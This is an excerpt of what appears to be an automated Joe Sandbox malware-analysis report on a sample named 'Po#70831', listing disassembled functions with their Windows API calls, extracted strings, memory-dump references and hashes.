                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 323675364-22481851
                                      • Opcode ID: ace76c6268d1c0415ffb23ac9f7d3fcbef12cb4cd33204d78e649b574d0ac3e6
                                      • Instruction ID: 3bf3d23a547f5807bf2cf781f140f0276d237f0ec4a6374a46c726e48a9efe74
                                      • Opcode Fuzzy Hash: ace76c6268d1c0415ffb23ac9f7d3fcbef12cb4cd33204d78e649b574d0ac3e6
                                      • Instruction Fuzzy Hash: B4413B72C1022CABCF21EFA5DC95CFEBB78BF54344B04416AE901A3161EB345E08CB94
                                      Function 00513C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00513C5C
                                      • CoInitialize.OLE32(00000000), ref: 00513C8A
                                      • CoUninitialize.OLE32 ref: 00513C94
                                      • _wcslen.LIBCMT ref: 00513D2D
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00513DB1
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00513ED5
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00513F0E
                                      • CoGetObject.OLE32(?,00000000,0052FB98,?), ref: 00513F2D
                                      • SetErrorMode.KERNEL32(00000000), ref: 00513F40
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00513FC4
                                      • VariantClear.OLEAUT32(?), ref: 00513FD8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                      • String ID:
                                      • API String ID: 429561992-0
                                      • Opcode ID: dbf4804a1360336f52b40ebc8781114fb039eac4ea23678add63ff9823e91722
                                      • Instruction ID: b5f7e9160ff56e9df7e2a0cbf9d45dbfe22f2c7cb7205710341d63b7101e0dd9
                                      • Opcode Fuzzy Hash: dbf4804a1360336f52b40ebc8781114fb039eac4ea23678add63ff9823e91722
                                      • Instruction Fuzzy Hash: B5C169716083059FE700DF68C89496BBBE9FF89748F10492DF98A9B251D730ED46CB52
                                      Function 00507A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00507AF3
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00507B8F
                                      • SHGetDesktopFolder.SHELL32(?), ref: 00507BA3
                                      • CoCreateInstance.OLE32(0052FD08,00000000,00000001,00556E6C,?), ref: 00507BEF
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00507C74
                                      • CoTaskMemFree.OLE32(?,?), ref: 00507CCC
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00507D57
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00507D7A
                                      • CoTaskMemFree.OLE32(00000000), ref: 00507D81
                                      • CoTaskMemFree.OLE32(00000000), ref: 00507DD6
                                      • CoUninitialize.OLE32 ref: 00507DDC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                      • String ID:
                                      • API String ID: 2762341140-0
                                      • Opcode ID: ad07a3fce8ada2d671938aabfe41dbfd3ebdd69ec9935f704249b9027a74a666
                                      • Instruction ID: 116ba421afa209ac221d2ce4b829e621b835a4855b58bd5f6180c90138939e79
                                      • Opcode Fuzzy Hash: ad07a3fce8ada2d671938aabfe41dbfd3ebdd69ec9935f704249b9027a74a666
                                      • Instruction Fuzzy Hash: CDC11A75A04109AFDB14DFA4C884DAEBFF9FF48314B1484A9E819DB262D730EE45CB90
                                      Function 0052541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00525504
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00525515
                                      • CharNextW.USER32(00000158), ref: 00525544
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00525585
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0052559B
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005255AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$CharNext
                                      • String ID:
                                      • API String ID: 1350042424-0
                                      • Opcode ID: e007e05f6fa90272de321d416d44202a6ed4ddc7ba2a577e5a8cb61f4beaedff
                                      • Instruction ID: 08d78f46dab7894430526f95d87c578230bfa3447ded01bdef6b0b1309c8e818
                                      • Opcode Fuzzy Hash: e007e05f6fa90272de321d416d44202a6ed4ddc7ba2a577e5a8cb61f4beaedff
                                      • Instruction Fuzzy Hash: 5A618D30900629ABDF209F54EC849FE7F79FF0A720F104545F925AB2D1E7749A85DBA0
                                      Function 004EFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004EFAAF
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 004EFB08
                                      • VariantInit.OLEAUT32(?), ref: 004EFB1A
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004EFB3A
                                      • VariantCopy.OLEAUT32(?,?), ref: 004EFB8D
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004EFBA1
                                      • VariantClear.OLEAUT32(?), ref: 004EFBB6
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 004EFBC3
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EFBCC
                                      • VariantClear.OLEAUT32(?), ref: 004EFBDE
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004EFBE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 86d37941d7a2b3b2caaffd0065d0e53ccd16eef6fd2bb54bcdded45321ae2aa0
                                      • Instruction ID: 440dd7cb190dccbeb868224923d624bfbd30aac335a42be41ba3b89e9dfc06c2
                                      • Opcode Fuzzy Hash: 86d37941d7a2b3b2caaffd0065d0e53ccd16eef6fd2bb54bcdded45321ae2aa0
                                      • Instruction Fuzzy Hash: 34416335A002199FCF10EF65CC549AEBFB9FF58345F00806AE915A7261D734A94ACF94
                                      Function 004F9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 004F9CA1
                                      • GetAsyncKeyState.USER32(000000A0), ref: 004F9D22
                                      • GetKeyState.USER32(000000A0), ref: 004F9D3D
                                      • GetAsyncKeyState.USER32(000000A1), ref: 004F9D57
                                      • GetKeyState.USER32(000000A1), ref: 004F9D6C
                                      • GetAsyncKeyState.USER32(00000011), ref: 004F9D84
                                      • GetKeyState.USER32(00000011), ref: 004F9D96
                                      • GetAsyncKeyState.USER32(00000012), ref: 004F9DAE
                                      • GetKeyState.USER32(00000012), ref: 004F9DC0
                                      • GetAsyncKeyState.USER32(0000005B), ref: 004F9DD8
                                      • GetKeyState.USER32(0000005B), ref: 004F9DEA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 265ea757c692cca93c149da9cbca4fd7d2f226d89b0a2c4bf04640ac44cdf546
                                      • Instruction ID: db72622372084045c634cfd7425cef4d9d45f3f1a9a86e28ba8502e2c3475c35
                                      • Opcode Fuzzy Hash: 265ea757c692cca93c149da9cbca4fd7d2f226d89b0a2c4bf04640ac44cdf546
                                      • Instruction Fuzzy Hash: 624197345047CD69FF31966488043B7BEA06F22344F18805BD7C6567C2D7A99DC8C7AA
                                      Function 0051055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 005105BC
                                      • inet_addr.WSOCK32(?), ref: 0051061C
                                      • gethostbyname.WSOCK32(?), ref: 00510628
                                      • IcmpCreateFile.IPHLPAPI ref: 00510636
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005106C6
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005106E5
                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 005107B9
                                      • WSACleanup.WSOCK32 ref: 005107BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: d36436377b2f502d2e604ded621001d77dd8c8c086636d128276a816b22b8a3a
                                      • Instruction ID: 038b291381174637f967b52807260fe2d48609e920328e3d4042729eba895f90
                                      • Opcode Fuzzy Hash: d36436377b2f502d2e604ded621001d77dd8c8c086636d128276a816b22b8a3a
                                      • Instruction Fuzzy Hash: 119167356042019FE720DF15C889B5ABFE0FF45318F1589A9E4698B6E2C7B4EC85CF81
                                      Function 00518CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharLower
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 707087890-567219261
                                      • Opcode ID: b0ae7af471f42499f3986e053f75e9fff5bc8d84ad4cd7e3fd71bcc66802062a
                                      • Instruction ID: 7cc8d5099ecf19ee0dfc21e5ad261e1189c58d6b1250fb193533b2601d2edcfb
                                      • Opcode Fuzzy Hash: b0ae7af471f42499f3986e053f75e9fff5bc8d84ad4cd7e3fd71bcc66802062a
                                      • Instruction Fuzzy Hash: 1551A071A001169BDF24DF6DC9509FEBBA6BF65324B20472AE826E72C5DB34DD80C790
                                      Function 0051372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32 ref: 00513774
                                      • CoUninitialize.OLE32 ref: 0051377F
                                      • CoCreateInstance.OLE32(?,00000000,00000017,0052FB78,?), ref: 005137D9
                                      • IIDFromString.OLE32(?,?), ref: 0051384C
                                      • VariantInit.OLEAUT32(?), ref: 005138E4
                                      • VariantClear.OLEAUT32(?), ref: 00513936
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 636576611-1287834457
                                      • Opcode ID: 08eb93b04895865358dd79bc0f8ff0f07f0ffd18edc87d04b14538a368229092
                                      • Instruction ID: 49d31072a9834f25f6f20cfccbcfd301cb8c914c78c2eb885cf17a127258b541
                                      • Opcode Fuzzy Hash: 08eb93b04895865358dd79bc0f8ff0f07f0ffd18edc87d04b14538a368229092
                                      • Instruction Fuzzy Hash: 96619B71608201AFE710DF55C898BAABFE8FF49714F10081EF98597291C774EE89CB96
                                      Function 00528B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                        • Part of subcall function 004A912D: GetCursorPos.USER32(?), ref: 004A9141
                                        • Part of subcall function 004A912D: ScreenToClient.USER32(00000000,?), ref: 004A915E
                                        • Part of subcall function 004A912D: GetAsyncKeyState.USER32(00000001), ref: 004A9183
                                        • Part of subcall function 004A912D: GetAsyncKeyState.USER32(00000002), ref: 004A919D
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00528B6B
                                      • ImageList_EndDrag.COMCTL32 ref: 00528B71
                                      • ReleaseCapture.USER32 ref: 00528B77
                                      • SetWindowTextW.USER32(?,00000000), ref: 00528C12
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00528C25
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00528CFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#V
                                      • API String ID: 1924731296-4270840044
                                      • Opcode ID: 40c49bbb48dc87f728442f9df4bc06b1164512cf8a18243148bde00f39ba93aa
                                      • Instruction ID: 0e7ef8949b8c3f8daa953391e77342e9f26d9388823717efe09aae937ee61246
                                      • Opcode Fuzzy Hash: 40c49bbb48dc87f728442f9df4bc06b1164512cf8a18243148bde00f39ba93aa
                                      • Instruction Fuzzy Hash: 88517C70105214AFD710DF14D895BBA7BE4BF99714F00062EF956AB2E2CB749D08CB66
                                      Function 00503388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 005033CF
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 005033F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LoadString$_wcslen
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 4099089115-3080491070
                                      • Opcode ID: bd5507e5ef2e11bddba64353aa4ed01ee83c2a167b1bf141a94535042c8f55bc
                                      • Instruction ID: 86bb25ccb7bb7a87b0d3d841a51c66a0c31c402ce7c8a52a76cc39535eb97270
                                      • Opcode Fuzzy Hash: bd5507e5ef2e11bddba64353aa4ed01ee83c2a167b1bf141a94535042c8f55bc
                                      • Instruction Fuzzy Hash: D951D131900109AACF14EBE1CD42EFEBB78BF14344F14406AF805720A2EB392F58DB64
                                      Function 004FB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 1256254125-769500911
                                      • Opcode ID: 52eddfc27c8280e9dbaea85d9fdbd0ea397caba70545a9edbdbaea3e69e2d73e
                                      • Instruction ID: ce882c5d7db6735ac371e51db350746c81560786fbd0a4c4fa257e7e79a5ca67
                                      • Opcode Fuzzy Hash: 52eddfc27c8280e9dbaea85d9fdbd0ea397caba70545a9edbdbaea3e69e2d73e
                                      • Instruction Fuzzy Hash: 1641E532A0012A9ADB106F7DC8905BF7BA5EFA2758B24412BE621D7380F739CD81C7D5
                                      Function 00505393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 005053A0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00505416
                                      • GetLastError.KERNEL32 ref: 00505420
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 005054A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
